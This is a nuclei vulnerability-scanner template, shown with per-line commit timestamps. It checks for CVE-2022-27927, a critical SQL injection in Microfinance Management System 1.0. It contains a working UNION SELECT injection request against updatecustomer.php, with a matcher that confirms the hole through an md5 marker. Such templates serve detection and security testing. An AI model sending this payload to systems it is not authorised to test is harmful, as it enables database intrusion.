nuclei-templates/cves/2022/CVE-2022-27927.yaml

44 lines
1.1 KiB
YAML
Raw Normal View History

2022-06-27 14:25:32 +00:00
id: CVE-2022-27927
info:
name: Microfinance Management System 1.0 - SQL Injection
2022-06-27 14:25:32 +00:00
author: lucasljm2001,ekrause
severity: critical
2022-06-27 14:50:28 +00:00
description: |
Microfinance Management System 1.0 is susceptible to SQL Injection.
2022-06-27 14:25:32 +00:00
reference:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27927
- https://www.sourcecodester.com/sites/default/files/download/oretnom23/mims_0.zip
- https://www.exploit-db.com/exploits/50891
- https://nvd.nist.gov/vuln/detail/CVE-2022-27927
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-27927
cwe-id: CWE-89
2022-06-28 10:15:15 +00:00
metadata:
2022-07-06 09:07:18 +00:00
verified: true
tags: cve,cve2022,sqli,microfinance
2022-06-27 14:25:32 +00:00
2022-06-30 03:36:59 +00:00
variables:
num: "999999999"
2022-06-27 14:25:32 +00:00
requests:
2022-06-27 14:58:33 +00:00
- raw:
2022-06-27 14:42:38 +00:00
- |
2022-06-30 03:36:59 +00:00
GET /mims/updatecustomer.php?customer_number=-1'%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT(md5({{num}}),1,2),NULL,NULL,NULL,NULL,NULL,NULL' HTTP/1.1
2022-06-28 10:15:15 +00:00
Host: {{Hostname}}
2022-06-27 14:25:32 +00:00
matchers-condition: and
matchers:
2022-06-28 10:15:15 +00:00
2022-06-27 14:25:32 +00:00
- type: word
2022-06-27 20:03:09 +00:00
part: body
2022-06-27 14:25:32 +00:00
words:
2022-06-30 03:36:59 +00:00
- '{{md5({{num}})}}'
2022-06-27 14:50:28 +00:00
2022-06-27 14:25:32 +00:00
- type: status
status:
2022-06-27 14:34:40 +00:00
- 200
# Enhanced by mp on 2022/07/04